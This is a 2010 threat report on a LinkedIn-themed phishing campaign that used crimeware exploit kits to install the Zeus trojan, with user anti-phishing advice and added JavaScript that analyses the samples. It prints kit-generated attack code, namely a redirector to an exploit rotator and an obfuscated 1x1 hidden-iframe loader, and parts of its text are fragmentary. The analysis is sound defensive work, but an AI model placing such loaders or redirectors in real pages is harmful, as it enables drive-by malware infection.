8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1) 1/7
ISSUE DATE: 22 OCTOBER 2010
LARGE-SCALE MALICIOUS
LINKEDIN PHISHING CAMPAIGN
Copyright and Disclaimer
This report is © Entity X, 2010. Where it has not been possible to locate the original copyright owner of photographs and other non-Entity X content we tender our apologies to any owner whose rights may have been unwittingly infringed. The links to external websites included in this report are for ease of reference only and Entity X takes no responsibility for the content presented.
THE DAEDALUS REPORT SERIES
The Entity X Daedalus series of reports informs clients of emerging trends and developments in the areas of cyber threats, net-centric security and electronic attack, authored by respected experts on the subject. The main monthly Daedalus Report provides comprehensive analysis of notable emerging issues; Daedalus Focus reports are issued as developments occur, providing technical detail and code samples when appropriate; Daedalus Special reports are issued to certain government clients only, highlighting sensitive matters relating to exploitation opportunities. All Daedalus subscribers are invited to request subjects to be covered in our Focus and Special reports, and to provide feedback on any of our products.
Contributors
Robi Sen, Analysis Director, Entity X
ABOUT ENTITY X
but now it affects every aspect of our lives, our work and our government.
and net-centric warfare. We're a team of highly experienced IT professionals
we seek to develop in our clients a greater and deeper understanding of the
range of disparate yet rapidly evolving threats that governments, businesses and
individuals face. Entity X Inc produces the Daedalus report series to inform and
brief our clients and we also provide consultancy and training in this specialized
LARGE-SCALE MALICIOUS LINKEDIN PHISHING CAMPAIGN
Report Overview
A malicious phishing campaign themed on the LinkedIn networking website has been underway since the last week of September and through early October. The campaign shows a higher than usual degree of sophistication on the part of the phishers: although the phishing emails all use well-crafted LinkedIn-style templates intended to trick the user into following a link to a website that will attempt to exploit their browser to install a Zeus trojan, the actual exploits are being auto-generated by crimeware tools. Furthermore, the phishers have changed the crimeware tools they use multiple times, perhaps in an attempt to keep building momentum for their campaign. This could be a trend in phishing and malware attacks where malicious hackers and criminal networks use crimeware to accelerate and keep changing their campaigns, in order to reduce the ability of email providers, ISPs and similar organisations to block or counter them.
SUMMARY
Large-scale and changing LinkedIn-themed phishing attack underway from late September into October
Attack tactic involves changing the means used to exploit targets
Phishing campaign developers making large-scale use of various crimeware tools to attempt to install Zeus trojans
Attack demonstrates a more sophisticated, persistent and adaptable phishing campaign than usual, perhaps because of the use of crimeware tools that enable rapid setup and development of malware attacks
LinkedIn-Themed Phishing Email
Recently a more sophisticated than usual phishing campaign has been targeting users of the professional social networking site LinkedIn. Although the threat from the campaign is not particularly high, it shows an increasing sophistication in phishing tactics, an increase in the use of crimeware¹ tools, and an increase in the targeting of social networks. An example of one of the phishing emails can be seen in Fig. 1 as it appeared in Google's Gmail. One of
people have been tricked into believing this is a genuine LinkedIn email.
¹ By crimeware toolkits we mean software specially written for criminals that makes the generation of viruses, trojans, malware-infected websites, spam/phishing campaigns, and even command and control of botnets simple GUI-based operations.
Fig. 1: A LinkedIn phishing email as it appeared in Gmail
Analysis
Clicking on the "Visit your InBox now" link takes the user to a website whose JavaScript (see Code Listing 1 below) redirects the user on to a second website that attempts to exploit their machine; that JavaScript was created by the SEO Sploit Kit.
// First browser check: is the Java plug-in enabled?
if (navigator.javaEnabled())
{
    var metka = 2;
}
// `var` is hoisted, so if neither branch runs metka is still undefined and the
// query string becomes unique=undefined
location.href = ("http://someaddress.info/asdfasgs/rotator.php?unique=" + metka + "");

// Second check: the property name "taintEnabled" is assembled from two
// fragments so a plain-text signature for it does not match the page
if (!frames.navigator["taintE" + "nabled"]())
{
    var metka = 1;
}
location.href = ("http://someaddres.info/asdfasgs/rotator.php?unique=" + metka + "");
Code Listing 1: Landing-page JavaScript that sends the visitor to rotator.php with a value set by two browser checks: navigator.javaEnabled() and the legacy navigator.taintEnabled() test (a Netscape-era data-tainting feature that Gecko browsers implement and others do not, used here as a browser fingerprint). The method name is split into two string fragments to evade simple signature matching.
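As an added example (not code from the report or from the kit), the following replays the control flow of Code Listing 1 against stubbed browser objects, so the value that would be sent in rotator.php?unique= can be read off for each browser profile without contacting the site. The window stubs, the makeWindow() profile helper and the function names are assumptions made for this demonstration; the rotator URL is the placeholder used in the listing.

```javascript
// Added example, not part of the original report: replay of the Code Listing 1
// redirector against stub `window` objects. ROTATOR is the report's placeholder URL.
const ROTATOR = "http://someaddress.info/asdfasgs/rotator.php?unique=";

// The listing builds the property name from two literals so that a simple
// signature for "taintEnabled" does not match the page source.
function obfuscatedName() {
  return "taintE" + "nabled";
}

// Faithful re-implementation of the landing page's control flow. `win` stands
// in for the browser `window`; redirects are collected instead of followed.
function runRedirector(win) {
  const redirects = [];
  var metka; // `var metka` inside the if-blocks hoists to function scope, so it starts undefined
  if (win.navigator.javaEnabled()) {
    metka = 2;
  }
  redirects.push(ROTATOR + metka + "");
  // Where navigator.taintEnabled does not exist (Internet Explorer, for instance)
  // this call throws a TypeError and the script stops after the first redirect.
  if (!win.frames.navigator[obfuscatedName()]()) {
    metka = 1;
  }
  redirects.push(ROTATOR + metka + "");
  return redirects;
}

// Constructed browser profiles (assumptions, for the demonstration only).
// Gecko browsers of the period implemented taintEnabled() and returned false.
function makeWindow(javaEnabled, hasTaintEnabled) {
  const navigator = { javaEnabled: () => javaEnabled };
  if (hasTaintEnabled) {
    navigator.taintEnabled = () => false;
  }
  return { navigator, frames: { navigator } };
}

// The URL the browser would finally navigate to, or the error that stopped the script.
function finalTarget(win) {
  try {
    const r = runRedirector(win);
    return r[r.length - 1];
  } catch (e) {
    return "error: " + e.constructor.name;
  }
}
```

A real browser does not navigate at the first `location.href` assignment; the script keeps running and a later assignment replaces the pending navigation, so for a Gecko profile the final target carries unique=1 regardless of Java, while a browser without taintEnabled() stops with a TypeError after the first assignment (unique=2 with Java, unique=undefined without). Those four outcomes are exactly what the stubs make visible.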
if none of them works the user is simply redirected to Google. The JavaScript is actually
Windows Help and Support, and Adobe's Acrobat Reader via a PDF. For an example see Code Listing 2 and Code Listing 3 below.
http://www.ipolicynetworks.com/technology/files/Seo_Analysis.html
// One function per exploit; the bodies were omitted from the listing
function PDF()
{ .. }
function arbt()
{ .. }
function JAVABOF()
{ .. }
function MkM720Jny()
{ .. }
function JAVASGB()
{ .. }
function JAVASMB()
{ .. }
// || short-circuits, so the chain stops at the first function that returns a truthy value
if (PDF() || arbt() || MkM720Jny() || JAVASMB() || JAVASGB() || JAVABOF() )
{
}
// Whatever happened, bounce the visitor to Google after 7 seconds (plus 1 more in REDIRECT)
setTimeout(function ()
{
    REDIRECT()
}
, 7000);
function redir()
{
    window.location = "http://google.com";
}
function REDIRECT()
{
    setTimeout("redir();", 1000);
}
Code Listing 2: SEO Sploit Kit generated JavaScript that calls six different functions, each of which tries to install the Zeus trojan; when all of them fail the visitor is sent on to Google
Xbwd72ue1rb = 25-(12*2);                          // evaluates to 1: the frame will be one pixel square
var Jztblyv7l = document.createElement("div");
Jztblyv7l.id = "Gtjpqcdqt9jlbp";
document.body.appendChild(Jztblyv7l);
Yej6pkmusdgjp = Xbwd72ue1rb;                      // dead assignment, padding only
// The tag name is hidden in a junk-padded literal; replace() strips the padding, leaving "iframe"
Qb0inb27krky = document.createElement("i)@f&!r())a !#&m)&e@))".replace(/$|#|&|\ |\(|\)|@|\!/ig, ""));
Qb0inb27krky.src = Rioso4oplcgzzhd8;              // the exploit URL, assigned elsewhere in the kit's page (not shown)
Qb0inb27krky.height = Xbwd72ue1rb;
Qb0inb27krky.width = Xbwd72ue1rb;
document.getElementById("Gtjpqcdqt9jlbp").appendChild(Qb0inb27krky);
return 0;
}
Code Listing 3: Obfuscated loader fragment from the same page. The padded literal resolves to "iframe", and the resulting 1x1 pixel frame, pointed at the exploit URL held in Rioso4oplcgzzhd8, is appended to a freshly created div so the exploit page loads invisibly
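Replaying the Code Listing 3 loader against a stub DOM, as an added example that is not part of the original report or of the kit: decodeTagName() applies the fragment's own junk-stripping regex to show that the padded literal resolves to "iframe", replayLoader() runs the fragment's statements against a minimal fake document, and findHiddenFrames() then reports any frame too small to be visible. The fake document, the helper names and the exploit URL are assumptions for this demonstration; the report does not give the value the kit stores in Rioso4oplcgzzhd8.

```javascript
// Added example, not from the report or the kit: replay of the Code Listing 3
// fragment against a minimal fake DOM to see what it injects. The exploit URL
// passed in is a constructed placeholder.

// The kit hides the tag name in a junk-padded literal and strips the padding
// at run time; this is the same regex the fragment uses.
function decodeTagName(padded) {
  return padded.replace(/$|#|&|\ |\(|\)|@|\!/ig, "");
}

function findById(node, id) {
  if (node.id === id) return node;
  for (const child of node.children) {
    const hit = findById(child, id);
    if (hit) return hit;
  }
  return null;
}

// Just enough of `document` for this fragment: elements are plain objects
// with a tagName, a child list and whatever properties the loader sets.
function makeFakeDocument() {
  const createElement = (tagName) => ({
    tagName,
    children: [],
    appendChild(child) { this.children.push(child); return child; },
  });
  const body = createElement("body");
  return { body, createElement, getElementById: (id) => findById(body, id) };
}

// The fragment's statements, with `document` and the exploit URL supplied as
// parameters instead of globals. The variable names are the kit's own.
function replayLoader(document, Rioso4oplcgzzhd8) {
  const Xbwd72ue1rb = 25 - (12 * 2); // 1: the frame will be one pixel square
  const Jztblyv7l = document.createElement("div");
  Jztblyv7l.id = "Gtjpqcdqt9jlbp";
  document.body.appendChild(Jztblyv7l);
  const Qb0inb27krky = document.createElement(decodeTagName("i)@f&!r())a !#&m)&e@))"));
  Qb0inb27krky.src = Rioso4oplcgzzhd8;
  Qb0inb27krky.height = Xbwd72ue1rb;
  Qb0inb27krky.width = Xbwd72ue1rb;
  document.getElementById("Gtjpqcdqt9jlbp").appendChild(Qb0inb27krky);
  return 0;
}

// Walk the tree and report frames too small to see: the signature of a drive-by loader.
function findHiddenFrames(document, maxPixels = 2) {
  const hits = [];
  const walk = (node, parentId) => {
    if (node.tagName === "iframe" && node.width <= maxPixels && node.height <= maxPixels) {
      hits.push({ src: node.src, width: node.width, height: node.height, parentId });
    }
    node.children.forEach((child) => walk(child, node.id));
  };
  walk(document.body, null);
  return hits;
}

// Build a fresh fake document, replay the loader into it and return what was injected.
function analyseLoader(exploitUrl) {
  const doc = makeFakeDocument();
  replayLoader(doc, exploitUrl);
  return findHiddenFrames(doc);
}
```

analyseLoader("http://example.invalid/exploit.php") returns a single hit: a 1x1 iframe with that src, parented by the div with id Gtjpqcdqt9jlbp. The same stub-DOM approach works for any loader fragment whose only side effects are element creation and insertion, which is why it is a cheap first pass before running a sample in a real sandboxed browser.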
If any of these exploits work then the user's computer will be infected with the Zeus trojan.
a period of a few days, appeared to change the crimeware kit they used two times. The
Phoenix toolkit. Then within
a number of days the perpetrator started another mass-emailing using the Crimepack toolkit, each time using slightly different exploits but in general always to push trojans that would turn an exploited user's computer into a zombie for a botnet like Zeus. This is important in that it shows how crimeware allows even technically unsophisticated criminal groups to rapidly change their attack campaigns.
Fortunately most of the major anti-virus and malware companies keep up with crimeware
However, many users do not keep their anti-virus programs up to date and are therefore putting themselves at risk from such phishing attacks. Furthermore, it also seems that variants of this same phishing campaign targeted Apple OSX users, infecting them with the Zeus trojan. This is interesting in that while OSX has been attacked and has numerous viruses, Apple operating systems have largely been ignored by phishing attacks using malware to infect user systems, suggesting that malware campaigns will increasingly attack Apple products.
Avoiding Phishing Campaigns
1 Authenticate senders
2 Look for obvious signs of phishing
3 Do not click on links
4 Be careful when opening attachments, regardless of sender
applications up to date
Phishing attacks depend on the fact that most computer users practise poor internet hygiene, are not aware of threats, and are too busy or distracted to pay attention to the content of their emails. All but the most sophisticated phishing attacks can be avoided by following some very simple steps:
1 Authenticating senders: Always turn on view email headers in your email program.
Gmail, offer an equivalent.
2 Look for obvious signs of phishing: Look for bogus email addresses, link addresses that do not match the sender, poorly spelled or grammatically incorrect content, or simply out-of-context requests. For an example see Fig. 2.
3 Do not click on links: For example, in the case of this LinkedIn campaign, instead of clicking on the "Visit your InBox now" link, users would be protected by going directly to the LinkedIn website and checking their messages from there.
http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html#googtrans%28es%7Cen%29
http://www.offensivecomputing.net/?q=node/1572
http://mail.google.com/support/bin/answer.py?hl=en&answer=180707
4 Be careful when opening attachments, regardless of sender: Unless you are
authenticity of their email.
up to date:
but most malware threats take advantage of security holes in browsers, applications,
users not keeping their systems up to date.
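Steps 1 and 2 of the checklist above can be applied mechanically to a raw message. The following is an added example, not code from the report: it parses the headers, compares the sender's display name and Return-Path against the address actually used, and compares each link's text with the host it points to, which is what mousing over a link reveals by hand. SAMPLE_EMAIL is constructed for this demonstration and only modelled on the campaign's lure; the placeholder domain is the one the report's listings use, the IP address is from a documentation range, and the function names are this example's own.

```javascript
// Added example, not from the report: automates checklist steps 1 and 2 for a
// raw message. SAMPLE_EMAIL is constructed for the demonstration.
const SAMPLE_EMAIL = [
  "Return-Path: <bounce@someaddress.info>",
  "Received: from mail.someaddress.info ([203.0.113.10]) by mx.example.net",
  "From: LinkedIn <messages@someaddress.info>",
  "Subject: Reminder: you have a message waiting",
  "Content-Type: text/html",
  "",
  "<p>You have one pending message.</p>",
  '<p><a href="http://someaddress.info/asdfasgs/index.php">Visit your InBox now</a></p>',
  '<p><a href="http://www.linkedin.com/">Unsubscribe</a></p>',
].join("\r\n");

// Split a raw RFC 822 message into a header map and a body; folded headers are unfolded.
function parseMessage(raw) {
  const [head, ...rest] = raw.split(/\r?\n\r?\n/);
  const headers = {};
  head.split(/\r?\n(?!\s)/).forEach((line) => {
    const m = line.match(/^([\w-]+):\s*([\s\S]*)$/);
    if (m) headers[m[1].toLowerCase()] = m[2].replace(/\r?\n\s+/g, " ");
  });
  return { headers, body: rest.join("\n\n") };
}

function addressOf(headerValue) {
  const m = headerValue.match(/<([^>]+)>/);
  return (m ? m[1] : headerValue).trim().toLowerCase();
}
function domainOf(address) { return address.slice(address.lastIndexOf("@") + 1); }
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}
function underDomain(host, domain) { return host === domain || host.endsWith("." + domain); }

// Step 1 (sender) and step 2 (links) of the checklist, for a message that
// claims to come from expectedDomain. Returns one finding per mismatch.
function checkMessage(raw, expectedDomain) {
  const { headers, body } = parseMessage(raw);
  const findings = [];
  const from = headers["from"] || "";
  const fromAddr = addressOf(from);
  const displayName = from.replace(/<[^>]*>/, "").trim();
  const brand = expectedDomain.split(".")[0];
  // The visible name claims the brand, but the address behind it lives elsewhere.
  if (displayName.toLowerCase().includes(brand) && !underDomain(domainOf(fromAddr), expectedDomain)) {
    findings.push({ check: "sender", detail: `display name "${displayName}" but address ${fromAddr}` });
  }
  // The bounce address disagrees with From: another header-level tell.
  if (headers["return-path"]) {
    const rp = addressOf(headers["return-path"]);
    if (domainOf(rp) !== domainOf(fromAddr)) findings.push({ check: "return-path", detail: `${rp} vs ${fromAddr}` });
  }
  // What the link says versus where it actually points.
  const linkRe = /<a\s[^>]*href\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = linkRe.exec(body)) !== null) {
    const host = hostOf(m[1]);
    const text = m[2].replace(/<[^>]+>/g, "").trim();
    if (host === null || !underDomain(host, expectedDomain)) {
      findings.push({ check: "link", detail: `"${text}" -> ${m[1]}` });
    }
  }
  return findings;
}

// Usage: checkMessage(SAMPLE_EMAIL, "linkedin.com") flags the sender and the
// "Visit your InBox now" link; the Unsubscribe link under linkedin.com passes.
```

The checks are deliberately domain-based rather than address-based: a lure that forges a linkedin.com From address would pass the sender check, which is why the Return-Path comparison and the link check are kept separate, and why step 3 (go to the site directly) still matters when all three are clean.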
Fig. 2: LinkedIn phishing email from 1 October 2010. When viewed in Microsoft Outlook with view headers turned on the email address can be immediately
while mousing over a link shows it pointing to a suspect URL.
Callouts: Fake address; Phishing link
IMPLICATIONS
Security professionals: Spam and phishing will continue to be major issues,
with training users on how to protect themselves from this threat being the major
means to stop it.
Intelligence professionals: Intelligence professionals should note that it would
be a short step from theming LinkedIn phishing emails to actually setting up a
campaign that targets intelligence professionals who use LinkedIn themselves. There
is a surprisingly high number of law enforcement, defence, security, and intelligence
employees who use LinkedIn who could be susceptible to targeted phishing attacks.